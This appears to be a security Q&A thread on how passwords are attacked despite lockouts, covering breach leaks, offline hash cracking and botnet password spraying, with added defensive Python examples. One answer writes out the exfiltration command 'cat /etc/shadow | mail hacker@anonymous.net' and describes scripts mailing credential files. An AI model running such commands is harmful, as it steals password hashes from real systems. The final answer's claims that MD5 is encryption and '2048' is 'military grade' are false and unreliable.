
I understand from a cryptographic standpoint that you want a password to be as random as possible to resist brute force or dictionary attacks. That is fine, but in what circumstances can those approaches actually be taken? Just about every system I have ever had a password to locks you out if you enter more than a couple of incorrect guesses. We're looking at millions of guesses even for very weak passwords, which seems to be impossible on these types of systems.

How do people go about attacking passwords other than by social engineering?

Paul Becotte

4 Answers

Analysis of the 32 million passwords recently exposed in the breach of social media application developer RockYou last month provides further proof that consumers routinely use easy to guess login credentials. Sensitive login credentials - stored in plain text - were left exposed because of a SQL injection bug in RockYou's website.

The emails and passwords of around 1.3 million registered users – including those of Gawker Media owner Nick Denton and its employees – were accessed and subsequently published online.

The social networking website LinkedIn was hacked on 5 June 2012, and passwords for nearly 6.5 million user accounts were stolen.

A hacker collective calling itself D33Ds Co. publicly posted more than 450,000 log-in credentials -- i.e., paired usernames and passwords -- obtained from Yahoo's "Contributor Network" site.

It all started when Adobe reported the breach of more than 3 million customers' information (including password-identifying information), then upped the number to 38 million. Last week it got a whole lot worse when an outside company found the data of some 152 million Adobe customers on a site frequented by cybercriminals.

Turkish hacker Maxn3y defaced avadas.de on Saturday (archive here) before dumping what the hacker claimed were customer details online. The purportedly leaked information included incomplete configuration files for the shop.avadas.de domain, what appeared to be authentic admin login details with encrypted passwords, and (most seriously), what security experts believe is the PayPal payment information for an estimated 20,000 consumers. According to Cyberwarnews.info, which analysed the data dump, the hackers also grabbed the email addresses, user names, encrypted passwords as well as certain bank and payment details of the customers.

Thousands of Tesco customers have had their emails and passwords posted online after hackers got their hands on the login details.

Relying on the rate limit on password attempts is all well and good until the password database gets leaked.

When the password database is in cleartext, the game is over for this password. You can't mitigate that by having a strong password, only by not reusing the same password (or an easy-to-modify password such as swordfish!Yahoo vs swordfish!Tesco) on different sites.

When the password database is hashed, it takes some time for attackers to run an offline search and find the passwords. The stronger the password and the better the hash, the longer the attacker will need. If your password is strong enough, then you may have a chance to change your password before any attacker finds your password. This puts users in competition: the weakest passwords will be the first to be exploited. Even in this case, you'll need to change the password everywhere you use it, which strongly argues in favor of genuinely site-unique passwords.

Gilles 'SO- stop being evil'
Plaintext leaks are always "Game Over, Dude!". For putting "weak" passwords into perspective, take a look at [Hashcat's speeds](http://hashcat.net/oclhashcat/) to see how quickly an attacker can work. For instance, take the horrifically bad case of single MD5; a single attacker with "PC5 (8x AMD R9 290X stock core clock)" can attempt 81.549 billion tries per second. That's over 2.11E17 (over 2^57) tries per 30 day month. – Anti-weakpasswords Feb 22 '14 at 02:24
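To make the answer's point concrete (a leaked database is an offline search, and what buys time is the hash and the password, not the login rate limit), here is an added example that is not part of the answer or the comment. It builds a small constructed "leak" of four accounts, stores it once as unsalted MD5 and once as salted PBKDF2-HMAC-SHA256 (Python's stdlib; the 100,000-iteration count is an assumption, not a recommendation from the page), then audits both copies against a short constructed wordlist and counts the hashing work each audit needs. It also checks the 2^57-per-month figure from the comment against the quoted 81.549 billion hashes per second.

```python
import hashlib
import hmac
import secrets

# Constructed "leaked" user table (not real data). Plaintext passwords appear
# only so the example can build both hashed variants of the same database.
LEAKED_USERS = {
    "alice": "password",
    "bob": "123456",
    "carol": "swordfish!Yahoo",                 # reused-with-site-suffix pattern
    "dave": "correct-horse-battery-staple-7Q",  # site-unique, in no wordlist
}

# Constructed short wordlist: the guesses an auditor (or attacker) tries first.
COMMON_PASSWORDS = ["123456", "password", "qwerty", "letmein", "swordfish!Yahoo"]


def md5_store(password):
    """Unsalted fast hash: the bad case named in the comment above."""
    return hashlib.md5(password.encode()).hexdigest()


def pbkdf2_store(password, iterations=100_000):
    """Salted slow hash (PBKDF2-HMAC-SHA256); iteration count is an assumption."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{salt.hex()}${iterations}${dk.hex()}"


def pbkdf2_verify(password, stored):
    salt_hex, iterations, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def hash_database(users, store):
    return {user: store(pw) for user, pw in users.items()}


def audit_md5(hashed, wordlist=COMMON_PASSWORDS):
    """Unsalted hash: hash each guess once, then look every user up in the
    table. Returns (cracked accounts, number of hash computations)."""
    table = {md5_store(guess): guess for guess in wordlist}
    found = {user: table[h] for user, h in hashed.items() if h in table}
    return found, len(wordlist)


def audit_pbkdf2(hashed, wordlist=COMMON_PASSWORDS):
    """Salted slow hash: every guess is recomputed per user, and each
    recomputation costs `iterations` underlying hashes. Returns (cracked
    accounts, total underlying hash computations)."""
    found, work = {}, 0
    for user, stored in hashed.items():
        iterations = int(stored.split("$")[1])
        for guess in wordlist:
            work += iterations
            if pbkdf2_verify(guess, stored):
                found[user] = guess
                break
    return found, work


def hashes_per_month(hashes_per_second, days=30):
    return hashes_per_second * days * 86400


def months_to_exhaust(entropy_bits, hashes_per_second):
    """Worst-case months to try every password of the given entropy."""
    return (2 ** entropy_bits) / hashes_per_month(hashes_per_second)


if __name__ == "__main__":
    md5_db = hash_database(LEAKED_USERS, md5_store)
    print("MD5 store:   ", audit_md5(md5_db))
    pbkdf2_db = hash_database(LEAKED_USERS, pbkdf2_store)
    print("PBKDF2 store:", audit_pbkdf2(pbkdf2_db))
    rate = 81.549e9  # single-MD5 rate quoted in the comment above
    print(f"single-MD5 guesses per 30 days: {hashes_per_month(rate):.3g}")
    for bits in (40, 57, 80):
        print(f"{bits}-bit password vs single MD5: "
              f"{months_to_exhaust(bits, rate):.4f} months")
```

Both audits crack the same three accounts, which is the answer's "weakest passwords first" ordering; what differs is the work: five MD5 computations cover the whole table, while the salted PBKDF2 copy costs 1.3 million underlying hashes for four users and grows linearly with the user count. Dave's site-unique password is not reached by the wordlist at all, and even exhausting a 57-bit space at the comment's MD5 rate takes most of a month, which is the window the answer says a strong password buys you to change it.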

Let's assume you have a botnet that can distribute login attempts across many unique client IPs (enough that it's not easy for someone to simply firewall you), and you want to use your botnet to guess correct logins on popularwebsite.com by brute force. Let's also assume that popularwebsite.com locks a user account after 5 wrong login attempts in a row.

No problem. Crank up your botnet and throw 1000 login attempts per second at it, from a widely dispersed set of source IPs. Each login attempt uses one of the most common passwords (123456, password, etc.) and tries to guess a user account with that password. (Should be easy if they have an e-mail address database to get ideas from.) Does popularwebsite.com stop accepting all login attempts with that password if you don't guess the right user fast enough? I doubt it!

So what are our prospects here? First let's make some assumptions:

  • 20% of the user account names that we guess actually exist (factors affecting this would include gross number of accounts, correlation between user account and email address, quality of our email database)
  • 4.7% of users use password as their password

This would mean that if we just try password as the password every time, the probability of a single individual guessed login being right is:

47 / (1000 * 5) = 0.94%

So if we're 20% effective at guessing actual user accounts, then we get a hit about every 106 attempts doing this, or about 10 successes per second using our imagined botnet. This is without any server-side compromise or exploit, just guessing logins. And if our botnet runs on the home PCs of the users, the only way the target can stop the attack is to force 4.7% of their users to change their password, which would chase some of them away and we just start again with 123456.

But if people use passwords that no one else uses, it's nowhere near as easy to make this attack pay off.

wberry
+1 from me. This is the best answer. The other answers' focus on database compromise misses the main issue. – paj28 Feb 23 '14 at 08:39
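The pattern the answer describes (one common password tried once against each of many accounts, from many addresses) slips under a per-account lockout by design, so the defender's counter is detection that looks across accounts instead of per account. The following is an added example, not code from the answer: it runs a small constructed authentication log (the line format, the IP addresses and the usernames are all made up) through a detector that flags any one-minute window in which many distinct accounts fail while no single account reaches the lockout threshold, and it carries the answer's own numbers (20% valid-account guesses, 4.7% using "password", 1000 attempts per second) through the success-rate arithmetic. The thresholds are assumptions to tune per site.

```python
from collections import defaultdict
from datetime import datetime, timezone

# Constructed authentication log (not from the original answer), one event per
# line: "<UTC timestamp> <source ip> <username> <FAIL|OK>".
AUTH_LOG = [
    # Minute 1: one guess per account from many different addresses, the
    # spray pattern described above; no account comes near the lockout limit.
    "2014-02-22T08:00:01Z 203.0.113.1 alice FAIL",
    "2014-02-22T08:00:02Z 203.0.113.2 bob FAIL",
    "2014-02-22T08:00:03Z 203.0.113.3 carol FAIL",
    "2014-02-22T08:00:04Z 203.0.113.4 dave FAIL",
    "2014-02-22T08:00:05Z 203.0.113.5 erin FAIL",
    "2014-02-22T08:00:06Z 203.0.113.6 frank FAIL",
    "2014-02-22T08:00:07Z 203.0.113.7 grace FAIL",
    "2014-02-22T08:00:08Z 203.0.113.8 heidi FAIL",
    "2014-02-22T08:00:09Z 203.0.113.9 ivan OK",
    "2014-02-22T08:00:10Z 203.0.113.10 judy FAIL",
    "2014-02-22T08:00:11Z 203.0.113.11 mallory FAIL",
    "2014-02-22T08:00:12Z 203.0.113.12 oscar FAIL",
    # Minute 2: six failures against one account from one address; the
    # per-account lockout already handles this, so it is not a spray.
    "2014-02-22T08:01:01Z 198.51.100.7 bob FAIL",
    "2014-02-22T08:01:02Z 198.51.100.7 bob FAIL",
    "2014-02-22T08:01:03Z 198.51.100.7 bob FAIL",
    "2014-02-22T08:01:04Z 198.51.100.7 bob FAIL",
    "2014-02-22T08:01:05Z 198.51.100.7 bob FAIL",
    "2014-02-22T08:01:06Z 198.51.100.7 bob FAIL",
    # Minute 3: ordinary traffic with one mistyped password.
    "2014-02-22T08:02:05Z 192.0.2.10 alice OK",
    "2014-02-22T08:02:30Z 192.0.2.11 carol FAIL",
]


def parse_line(line):
    ts, ip, user, result = line.split()
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return when, ip, user, result


def detect_spray(lines, window_seconds=60, min_failing_users=10, lockout_threshold=5):
    """Return (window start, distinct failing accounts, distinct source IPs) for
    each window where many accounts fail yet none trips the per-account lockout.
    Threshold values are assumptions, not figures from the answer."""
    buckets = defaultdict(lambda: {"users": defaultdict(int), "ips": set()})
    for line in lines:
        when, ip, user, result = parse_line(line)
        if result != "FAIL":
            continue
        key = int(when.timestamp()) // window_seconds * window_seconds
        buckets[key]["users"][user] += 1
        buckets[key]["ips"].add(ip)
    alerts = []
    for key in sorted(buckets):
        users = buckets[key]["users"]
        if len(users) >= min_failing_users and max(users.values()) < lockout_threshold:
            start = datetime.fromtimestamp(key, timezone.utc).isoformat()
            alerts.append((start, len(users), len(buckets[key]["ips"])))
    return alerts


def expected_hit_rate(valid_account_fraction, password_share):
    """Probability that one (guessed account, fixed password) attempt succeeds:
    the account must exist and must use that password."""
    return valid_account_fraction * password_share


def attempts_per_hit(valid_account_fraction, password_share):
    return 1 / expected_hit_rate(valid_account_fraction, password_share)


if __name__ == "__main__":
    for start, users, ips in detect_spray(AUTH_LOG):
        print(f"spray suspected from {start}: {users} accounts failed from {ips} IPs")
    p = expected_hit_rate(0.2, 0.047)
    print(f"per-attempt success {p:.4%}, one hit per {attempts_per_hit(0.2, 0.047):.0f} "
          f"attempts, {1000 * p:.1f} hits/s at 1000 attempts/s")
```

Only the first minute is flagged: eleven accounts each fail exactly once from eleven addresses, which is invisible to a per-account counter but obvious once failures are counted across accounts. The single-account brute force in minute two is left to the lockout, and the lone typo in minute three never reaches the distinct-account threshold. The arithmetic reproduces the answer's figures: 0.2 × 0.047 = 0.94%, roughly one hit per 106 attempts, 9.4 hits per second at 1000 attempts per second.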

People with malicious intentions could go about stealing sensitive information (i.e. passwords) via the following methods.

  • Host intrusion

Example: I take up employment with the target company as a developer on a 3-month contract and am given a shell account on a server with limited privileges. I ask the system administrator to check for an unknown problem that hinders my work. I manage to persuade him/her to give me root privileges to a shell script written by me for five minutes, as it helps to customize the work environment and greatly speeds up my project. As he is busy with other things and has a meeting in ten minutes, he gives me root privileges to my custom script for 10 minutes. I have set up a trap: the malicious script is run with root privileges and emails the /etc/shadow file to my company email account. A few weeks later, after I have been granted VPN access, I VPN in from my home machine and copy/paste from my company email to my home desktop. I have obtained the password hashes.

  • Unauthorised physical access to workstations

Example: A malicious hacker takes up employment as a cleaner for the cleaning business that subcontracts for the company being attacked. He is authorised to access the premises of the IT department, including the system administrator's or chief developers' desks. He looks for passwords or sensitive information on post-it notes, or tries to find unlocked workstations, etc. Sooner or later he'll find one. Imagine the open terminal of the system administrator who accidentally left his shell terminal open after he had left for home in a rush. Of course, the sudo privileges with root access are still open, as he had forgotten to lock his workstation... While he is cleaning up the desk, brushing dust off the keyboard, he looks around: no one is watching, the whole office is empty, everyone has gone home for the day. He quickly types cat /etc/shadow | mail hacker@anonymous.net and obtains the password hashes.

  • XSS attack

Example: against a poorly protected web server, a malicious hacker manages to run an XSS script, where the code injection runs a command which mails him the file called /root/my.cnf, which the system administrator had forgotten to remove ever since the web server with MySQL had been set up. He had thought that his HOME directory was safe anyway, so removing files containing passwords from root's HOME was not a high priority. The MySQL password happens to be the same as the root password on that machine. With the root password, it's no mean feat to obtain other sensitive information, such as passwords for other, more protected servers.

The above methods are, I believe, not social engineering. Hope this helps to widen your imagination :)

miklosq

It looks like you're confusing various layers of security. The encryption of a file is one level of security, which could be MD5 encryption, which would be a type of encryption. Then you have the encryption strength associated with the MD5; 2048 would be military grade. The other layer of security is your password strength: the more complex, the better. Now, if you're looking to attack a password, you have to ask what the reason is, and whether the password is really what is needed to assess the vulnerability of a system, or whether you can find a workaround.

  • If you're looking to use the best possible method, then get your hands on a quantum computer. jk.

Rick